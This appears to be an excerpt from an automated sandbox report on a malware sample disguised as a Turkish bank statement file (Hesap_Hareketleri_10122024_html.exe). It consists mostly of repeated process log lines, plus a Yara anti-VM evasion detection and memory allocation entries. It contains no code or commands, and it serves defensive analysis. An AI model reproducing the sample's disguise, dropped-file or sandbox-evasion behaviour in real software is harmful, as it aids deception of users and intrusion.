Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Hesap_Hareketleri_10122024_html.exe PID: 2212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDYiGmDlq.exe PID: 7312, type: MEMORYSTR

Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Memory allocated: 24F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Memory allocated: 2730000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Memory allocated: 2530000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Memory allocated: 90A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Memory allocated: A0A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Memory allocated: A2D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Memory allocated: B2D0000 memory reserve \| memory write watch	Jump to behavior
